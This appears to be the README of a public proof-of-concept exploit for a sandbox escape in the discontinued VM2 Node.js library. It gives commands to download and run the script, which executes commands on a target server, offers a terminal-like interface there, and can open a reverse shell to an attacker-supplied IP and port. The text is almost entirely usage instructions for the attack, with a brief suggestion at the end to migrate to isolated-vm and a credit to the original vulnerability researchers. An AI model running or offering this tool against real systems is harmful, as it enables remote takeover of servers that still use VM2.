PoC Exploit for VM2 Sandbox Escape Vulnerability - All Versions
VM2-Exploit.mp4
Currently, the VM2 project has been discontinued. They released 65 versions, and all of its versions are vulnerable to command execution via sandbox escape.
- Note: This has been developed for easy and faster usage, so its usage might look different.
- Provide either a URL or copy-paste the cURL request from your browser (recommended to use Firefox).
- This will be using the Sandbox Escape in vm2@3.9.19 via Promise[@@species] method.
- If you haven't provided --ip and --port, the exploit will offer a terminal-like interface for executing commands on the target (though it's not a real interactive shell).
- If your target's version is < 3.6.17 consider using this.
- Feel free to contribute!
git clone https://github.com/rvizx/VM2-Exploit
cd VM2-Exploit
python3 exploit.py
or
wget https://raw.githubusercontent.com/rvizx/VM2-Exploit/main/exploit.py
python3 exploit.py
python3 exploit.py curl-command / target-url --additional-args
Additional Args:
--param = parameter that contains the command (the first one will be selected as default if not provided.)
--ip = your local IP for a reverse shell (--ip=12.24.34.3)
--port = your local port for a reverse shell (--port=7777)
--base64 = if the payload is encoded with base64
--hex = if the payload is encoded in hex
- consider migrating your code to isolated-vm
Xion (SeungHyun Lee) of KAIST Hacking Lab for disclosing these vulnerabilities and providing detailed analysis.